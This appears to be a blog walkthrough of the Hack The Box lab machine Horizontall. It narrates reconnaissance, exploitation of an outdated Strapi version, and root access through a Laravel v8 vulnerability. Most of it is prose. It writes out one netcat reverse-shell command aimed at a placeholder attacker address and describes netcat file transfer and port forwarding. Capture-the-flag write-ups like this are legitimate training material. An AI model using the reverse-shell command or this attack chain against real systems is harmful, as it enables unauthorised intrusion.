Horizontall Walkthrough — HTB
This blog is a walkthrough for a currently active machine Horizontall on the Hack The Box Platform.
Part 1 — Port Scanning
First of all, I scanned the ports on the target machine to understand what was going on there.
OpenSSH and Nginx services are running on the ports. I checked if there was any vulnerability on these services or not, but there was nothing useful.
Part 2 — Discovery On The Website
I kept going and started to discover to find hidden directories and files on the website.
I couldn’t find any useful directory or file from this search. I remembered that this website had been running on the Nginx server, and there could be any other virtual hosts with vulnerabilities. I started a vhost search with the gobuster tool. You can find the brute force wordlist here.
It was as ı guessed. I revealed another website that had been published on the target machine. I opened the website on the browser and saw just a basic welcome text page. I made one more directory discovery.
First of all, I visited the reviews directory and saw some reviews from users.
I kept visiting other directories that were founded on the search as well, but the only thing I saw was a login page aside from this reviews directory. I thought ı could make a password brute force with the usernames ı saw on the reviews page. It was a complete waste of time. I lost a lot of time with this idea. After ı found out this, I started to look for something different. Finally, ı managed to think of checking the code.
I saw the comments on the page source and started to be suspicious. I opened the js codes and started to examine them. I searched “strapi” to see things about strapi functions. I was skipping, suddenly ı noticed 3.0.0-beta.17.4 after starpi-plugin-content-type-builder in codes.
I did a quick search and found this is a version that has multiple vulnerabilities.
Part 3 — Exploit
I used netcat for this purpose but I didn’t use “nc -e /bin/bash [OUR IP ADDRESS] [PORT]” command to get a shell from the target as it is done most of the time. If you wonder the reason, I recommend you to read this cheat sheet. Also, you can find other possible commands to get a shell from the target machine.
I needed to get a TTY shell that’s why I have run a python command, accessed the user key.
Part 4 — Privilege Escalation
The first thing I thought was checking GTFOBins. I searched to find something useful, although ı found out what I needed, they were all useless because I didn’t have the password of starpi user. I decided to look for strapi user’s password for GTFOBins usage. I run linpeas.sh so I could have seen valuable files for my purpose. I used nc again for file transfer between machines. You can read how to do that here.
When I was scrolling down, suddenly I noticed the open ports on the local machine. Port 3306 is for MySql connection, port 1337 is for API calls, but port 8000 was strange. I ran a curl command to see what was going on there.
It was easy to notice that on port 8000 a Laravel v8 framework was working. I did a quick search about Laravel v8 framework.
It was what I needed. V8 is a version of Laravel that has a critical vulnerability. I searched for PoC code to run and become root user on the target machine. I found a PoC code that describes how to use it.
I have transferred the exploit code to run on the target machine, but I couldn’t access Github to run a git clone command. (If you have any solution for this please contact me.) I had to run exploit code from my attacking machine. I used port forwarding to be able to access port 8000. I recommend you watch this video if you are not sure about what port forwarding is.
This time I used another method for getting shell with netcat. I recommend you to learn about these techniques. They can be a lifesaver in some situations.
I am root now, I need to open root.txt in the /root directory and obtain root flag.
Thanks for reading :). You can be aware of new content by following me on Medium. If you have any questions, don’t hesitate to contact me.